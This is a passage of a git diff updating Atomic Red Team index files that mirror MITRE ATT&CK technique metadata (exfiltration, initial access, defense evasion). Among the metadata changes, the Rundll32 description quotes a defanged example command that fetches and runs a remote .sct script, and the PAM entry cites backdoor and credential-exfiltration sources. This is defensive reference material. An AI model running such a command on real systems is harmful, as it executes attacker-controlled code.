+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -60674,13 +61573,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60720,8 +61618,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60729,13 +61629,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60766,14 +61666,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60840,11 +61737,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60896,15 +61792,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60928,10 +61823,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60950,13 +61844,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60995,9 +61888,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -61047,7 +61939,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -61067,7 +61958,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61087,8 +61978,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -61135,7 +62024,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -61155,7 +62043,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61177,8 +62065,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -61232,7 +62118,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -61257,7 +62142,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -61292,12 +62177,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61322,11 +62205,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -61369,9 +62251,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -61418,7 +62299,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -61444,7 +62324,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61477,13 +62357,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -61532,12 +62410,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -61573,12 +62450,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -61587,7 +62463,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -61611,9 +62486,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -61636,7 +62510,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61658,8 +62532,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -61710,7 +62582,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -61760,7 +62631,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -61785,7 +62655,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -61808,13 +62678,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61855,9 +62723,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61905,7 +62772,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61927,7 +62793,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61951,12 +62817,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -62020,6 +62884,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml
index b704d288e4..c9104f39cb 100644
--- a/atomics/Indexes/iaas_azure-index.yaml
+++ b/atomics/Indexes/iaas_azure-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
